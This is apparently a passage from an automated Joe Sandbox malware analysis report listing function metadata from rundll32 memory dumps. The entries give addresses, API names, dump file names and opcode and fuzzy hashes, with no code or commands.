                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2099609381-0
                                                                                                                                  • Opcode ID: 24b7c03dd498b83a0c65312b7ca5d6416278fe3ae171dc0d21f53bbd2bd45fa8
                                                                                                                                  • Instruction ID: a8e0a09d42db750b5a98a0871f43130b3195003a1cfff66c9f5e6ffd359f83b0
                                                                                                                                  • Opcode Fuzzy Hash: 24b7c03dd498b83a0c65312b7ca5d6416278fe3ae171dc0d21f53bbd2bd45fa8
                                                                                                                                  • Instruction Fuzzy Hash: 9901F973F0928646F7314FA6E4607BD76A5EB50BB5F418335D668572C4DFBC94808700
                                                                                                                                  Function 00007FFD92DC1460 Relevance: 1.5, APIs: 1, Instructions: 15comCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateInstance
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 542301482-0
                                                                                                                                  • Opcode ID: 54e845f288bb733845b9e48990bf8ae3552a07acab0f2229878fb48aa12d56e2
                                                                                                                                  • Instruction ID: 1422f4c26d677426f1376f76c998a672c8e1b4f4a66605db0b6c5b00acb22cd9
                                                                                                                                  • Opcode Fuzzy Hash: 54e845f288bb733845b9e48990bf8ae3552a07acab0f2229878fb48aa12d56e2
                                                                                                                                  • Instruction Fuzzy Hash: 29E01A2AF08A4A84EE34DFD1E8A4065336CBB44784F854636D80C93334DF3CE129EB04
                                                                                                                                  Function 00000001800353EC Relevance: 1.5, APIs: 1, Instructions: 14COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnumSystemLocalesW.KERNEL32(?,?,?,?,00000001800423DB,?,?,00000140,0000000180042AAB), ref: 000000018003541D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EnumLocalesSystem
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2099609381-0
                                                                                                                                  • Opcode ID: ef170b939dcdfe0a6fa8f39585badaf32e39fbe27d88ffb3e5b79058c9fef6a5
                                                                                                                                  • Instruction ID: a17f45a68611e7ce09ab532a4d12380a5d0071377e1487d1a7a9af1b51f9b2a3
                                                                                                                                  • Opcode Fuzzy Hash: ef170b939dcdfe0a6fa8f39585badaf32e39fbe27d88ffb3e5b79058c9fef6a5
                                                                                                                                  • Instruction Fuzzy Hash: 5EE0EC35A05A0C81F7C74B12FCD57C623A0A75D3C6FE19601E44C56A70CE7883DD8B00
                                                                                                                                  Function 00007FFD92EC38E0 Relevance: 1.5, Strings: 1, Instructions: 261COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: yuv2yuvq: out-of-range matrix entry [%d] = %d (%.3f)
                                                                                                                                  • API String ID: 0-148861234
                                                                                                                                  • Opcode ID: 2c4204fbbe862159814e98aa42e07df5665e4c025c246ec07536e3330d50aefc
                                                                                                                                  • Instruction ID: d2eae275bee79c199599dbe7aa2fe4dbefbd67478abb9d49932a69b34236a354
                                                                                                                                  • Opcode Fuzzy Hash: 2c4204fbbe862159814e98aa42e07df5665e4c025c246ec07536e3330d50aefc
                                                                                                                                  • Instruction Fuzzy Hash: EAC19326E38F844ED2139B3550526B6A369AF7F6C5F16D313FA4B71E62DB34A1838700
                                                                                                                                  Function 00007FFD92DBD230 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoSystem
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 31276548-0
                                                                                                                                  • Opcode ID: 692cdf69a8af2ca06fa06deacd1959d792d6a01867b2755f0af50de4269ff097
                                                                                                                                  • Instruction ID: ab246caa81b9b41867d82b03e4a3355bd14f0454fcad544ed93f99036381ec9b
                                                                                                                                  • Opcode Fuzzy Hash: 692cdf69a8af2ca06fa06deacd1959d792d6a01867b2755f0af50de4269ff097
                                                                                                                                  • Instruction Fuzzy Hash: 1FC01262B0888583E5316794D49106A3230FF8070AF500130E54E52A91CD5CE5145F40
                                                                                                                                  Function 00007FFD92DBD0C0 Relevance: 1.5, Strings: 1, Instructions: 207COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                  • Opcode ID: e8c0ad89556ba9dcd585b874128fb0143d6e7aea8091f6a6b86a80fa4c4c7ff0
                                                                                                                                  • Instruction ID: 0ad025dfe84bc1381ae2a1477b44c5a155f15109cc484d5beb8ba4556413b25e
                                                                                                                                  • Opcode Fuzzy Hash: e8c0ad89556ba9dcd585b874128fb0143d6e7aea8091f6a6b86a80fa4c4c7ff0
                                                                                                                                  • Instruction Fuzzy Hash: 83815923B4E28646FBB88E97806067DA390AF01B46F94133DDD0E97685CFBDE845CB40
                                                                                                                                  Function 00007FFD92DBE590 Relevance: 1.5, Strings: 1, Instructions: 203COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                  • Opcode ID: 826cd064da79ca11da7c5a7f35c96355f8fdcfd1802eb9bae2af3f00da99aab4
                                                                                                                                  • Instruction ID: 96797d7885acbfea8ae1b90ce71816caf227369842004e665f96f3d530d5680b
                                                                                                                                  • Opcode Fuzzy Hash: 826cd064da79ca11da7c5a7f35c96355f8fdcfd1802eb9bae2af3f00da99aab4
                                                                                                                                  • Instruction Fuzzy Hash: 0D712323B8E24246FB788E96816027DA3D0AF41746F94173DCD4E8B7DACEBDE8458750
                                                                                                                                  Function 00007FFD92DCA0A0 Relevance: 1.4, Strings: 1, Instructions: 194COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ,=
                                                                                                                                  • API String ID: 0-1203540430
                                                                                                                                  • Opcode ID: fe5ee7259a1993f3c479d73e0debbad082496a2ac679abba8852d48e5468e8d2
                                                                                                                                  • Instruction ID: 039da1c8b6219739978ed3749917bc04205dcbcdf5ca8ef72ea36b7da6ecebdc
                                                                                                                                  • Opcode Fuzzy Hash: fe5ee7259a1993f3c479d73e0debbad082496a2ac679abba8852d48e5468e8d2
                                                                                                                                  • Instruction Fuzzy Hash: 8E41D3E3B603182AE91BC6BA7E12FAD90029B52BF5C5093256D3906BC5F13C59CB9580
                                                                                                                                  Function 00007FFD92DB1D60 Relevance: 1.4, Strings: 1, Instructions: 193COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                  • Opcode ID: 025061a446d99fa4a582877d23a1cf70bc94dbc301d1d2535e5616ce66c38c19
                                                                                                                                  • Instruction ID: 4049761c1b6233587fdd8b4a14b8c0dfa7642449976e35d47c7a57180bdde092
                                                                                                                                  • Opcode Fuzzy Hash: 025061a446d99fa4a582877d23a1cf70bc94dbc301d1d2535e5616ce66c38c19
                                                                                                                                  • Instruction Fuzzy Hash: E9612413B6E24746FAB88E9A807027FA3809F41746F94173DDD0A976C5CFBDE8418740
                                                                                                                                  Function 00007FFD92DC45D0 Relevance: 1.4, Strings: 1, Instructions: 193COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                  • Opcode ID: e8910a66f3b4aad5195f3891a66debd1221f84e70e89721fcd9cb75ffcb3049c
                                                                                                                                  • Instruction ID: d8b42fe45910b252f1722b475ba2b0995bfacdcfe00146bddb20cc0c126064f0
                                                                                                                                  • Opcode Fuzzy Hash: e8910a66f3b4aad5195f3891a66debd1221f84e70e89721fcd9cb75ffcb3049c
                                                                                                                                  • Instruction Fuzzy Hash: 3C612321B4C28346FA788E9751603BFA391AF42746F280735DD0B9B7D5CEBDE8468701
                                                                                                                                  Function 00007FFD92DCA100 Relevance: 1.4, Strings: 1, Instructions: 170COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ,=
                                                                                                                                  • API String ID: 0-1203540430
                                                                                                                                  • Opcode ID: 33d4d7e34787201e39c9991a04a014427dde3f5717439700d18cce60f76c9fff
                                                                                                                                  • Instruction ID: 25773c4bd6412297102f6d4fcc223398d9b2166fe448878bff6e86c87448bb34
                                                                                                                                  • Opcode Fuzzy Hash: 33d4d7e34787201e39c9991a04a014427dde3f5717439700d18cce60f76c9fff
